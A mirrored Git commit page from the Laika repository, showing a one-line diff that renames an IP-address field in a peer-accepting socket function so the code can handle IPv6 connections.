mirror of
https://github.com/CPunch/Laika.git
synced 2026-02-08 09:10:03 +00:00
Lib: Added support for IPV6 connections
This commit is contained in:
@@ -353,7 +353,7 @@ bool laikaC_pollPeers(struct sLaika_cnc *cnc, int timeout) {
|
||||
|
||||
LAIKA_TRY
|
||||
/* setup and accept new peer */
|
||||
laikaS_acceptFrom(&peer->sock, &cnc->sock, peer->ipv4);
|
||||
laikaS_acceptFrom(&peer->sock, &cnc->sock, peer->ipStr);
|
||||
laikaS_setNonBlock(&peer->sock);
|
||||
|
||||
/* add to our pollList */
|
||||
|
||||
Reference in New Issue
Block a user